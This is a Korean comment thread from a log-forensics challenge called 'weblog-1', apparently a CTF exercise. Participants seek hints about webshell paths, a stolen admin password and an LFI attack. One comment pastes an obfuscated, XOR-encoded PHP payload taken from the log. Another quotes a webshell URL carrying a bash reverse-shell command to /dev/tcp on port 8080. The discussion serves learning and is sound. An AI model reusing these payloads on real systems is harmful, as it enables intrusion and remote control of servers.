weblog-1

존재하지 않는 경로면 404에러를 뿜는다는점 이용해서 404인건 다 거르고 계속 찾는데 안나오네요... <?php function m($l,$T=0){$K=date('Y-m-d');$=strlen($l);$_=strlen($K);for($i=0;$i<$;$i++){for($j=0;$j<$_; $j++){if($T){$l[$i]=$K[$j]^$l[$i];}else{$l[$i]=$l[$i]^$K[$j];}}}return $l;} m('bmha[tqp[gkjpajpw')(m('+rev+sss+lpih+qthkew+miecawtlt'),m('8;tlt$laeav,&LPPT+55$040$Jkp$Bkqj`&-?w}wpai, [CAP_&g&Y-?')); ?> 지금 가장 의심가는게 이러한 php코드를 memo로 보내는건데 이게 웹셸 경로랑 무슨 상관있는지도 모르겠고... 못찾겠네요...후... 조그마한 힌트라도 주시면 감사하겠습니다.

로그에서 탈취된 암호를 얻는 거 같은데.. 아무리 찾아봐도 모르겠습니다. 힌트라도 주실 수 있나요?ㅠㅠ

http 응답코드 구분해서 확인, uploads경로 필터 후 확인 등 여러가지로 접근했는데.. 며칠째 해결이 안되네요.. 무엇을 중점적으로 보는게 나은지 약간의 힌트라도 부탁드립니다 ㅠㅠ

LFI 통한 PHP 코드 삽입 공격에 사용된 php 파일 입력하라는 걸로 이해했는데... 아무리봐도 LFI 취약점 있는 파일은 한개밖에 안보이는데... 제가 놓친게 있는건지요 ㅠ 해결되었습니다...

access.log 안에 있는거 맞나요?ㅜ

payload값을 어디서 찾아야할지 모르겠어요 ㅠㅠ 힌트좀 주실 수 있을까요

전체 경로 라는게 /uploads/sh.php?cc=bash%20-i%20%3E%26%20/dev/tcp/10.0.0.1/8080%200%3E%261 이런 url 이 있을떄 '/uploads/sh.php' 이것만 말하는건가요?

생성된 웹쉘의 경로란 /uploads/를 의미하나요? 아니면 다른 경로가 또 있나요? 어느 웹쉘을 가리키는 뜻인지 모르겠어요. 힌트 좀 주시겠어요?

탈취된 admin암호를 log에서 얻는것이 옳은가요?

파일의 전체 경로를 입력해주세요 어떤 경로를 말하는 건가요? file system 절대 경로라고 생각했는데... ㅁㄴㅇㄹ 게싱